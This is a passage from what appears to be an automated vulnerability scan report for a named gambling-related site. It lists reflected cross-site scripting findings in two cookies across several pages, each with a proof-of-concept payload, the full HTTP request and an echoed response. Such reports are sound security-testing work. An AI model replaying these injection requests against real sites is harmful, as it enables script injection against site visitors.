<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM24ff3"-alert(1)-"df7e568638e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.250. http://www.info.crazyscratch.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed195"-alert(1)-"f71ad2bba2f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PMed195"-alert(1)-"f71ad2bba2f; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMed195"-alert(1)-"f71ad2bba2f; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:17 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63410


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMed195"-alert(1)-"f71ad2bba2f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.251. http://www.info.crazyscratch.com/Privacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Privacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73f57"-alert(1)-"5495d4ede87 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM73f57"-alert(1)-"5495d4ede87; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: BO=FM73f57"-alert(1)-"5495d4ede87; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:43 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65555


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM73f57"-alert(1)-"5495d4ede87";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.252. http://www.info.crazyscratch.com/Privacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Privacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bcf6"-alert(1)-"d70bb160f5b was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM4bcf6"-alert(1)-"d70bb160f5b; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM4bcf6"-alert(1)-"d70bb160f5b; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:07 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65555


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM4bcf6"-alert(1)-"d70bb160f5b";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.253. http://www.info.crazyscratch.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b98d2"-alert(1)-"6f325db8eba was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMb98d2"-alert(1)-"6f325db8eba; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: BO=FMb98d2"-alert(1)-"6f325db8eba; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb98d2"-alert(1)-"6f325db8eba";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.254. http://www.info.crazyscratch.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d21f"-alert(1)-"c9877ced936 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM8d21f"-alert(1)-"c9877ced936; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8d21f"-alert(1)-"c9877ced936; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:03 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8d21f"-alert(1)-"c9877ced936";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.255. http://www.info.crazyscratch.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac727"-alert(1)-"63c733b0893 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMac727"-alert(1)-"63c733b0893; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: BO=FMac727"-alert(1)-"63c733b0893; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:57 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMac727"-alert(1)-"63c733b0893";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.256. http://www.info.crazyscratch.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a641"-alert(1)-"d0d94d4432a was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM5a641"-alert(1)-"d0d94d4432a; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM5a641"-alert(1)-"d0d94d4432a; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:21 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM5a641"-alert(1)-"d0d94d4432a";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.257. http://www.info.crazyscratch.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e7cf"-alert(1)-"adb1b7af95d was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM7e7cf"-alert(1)-"adb1b7af95d; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:52:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: BO=FM7e7cf"-alert(1)-"adb1b7af95d; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:37 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117971


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7e7cf"-alert(1)-"adb1b7af95d";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.258. http://www.info.crazyscratch.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ee3a"-alert(1)-"140d6128279 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM7ee3a"-alert(1)-"140d6128279; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM7ee3a"-alert(1)-"140d6128279; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:51 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117971


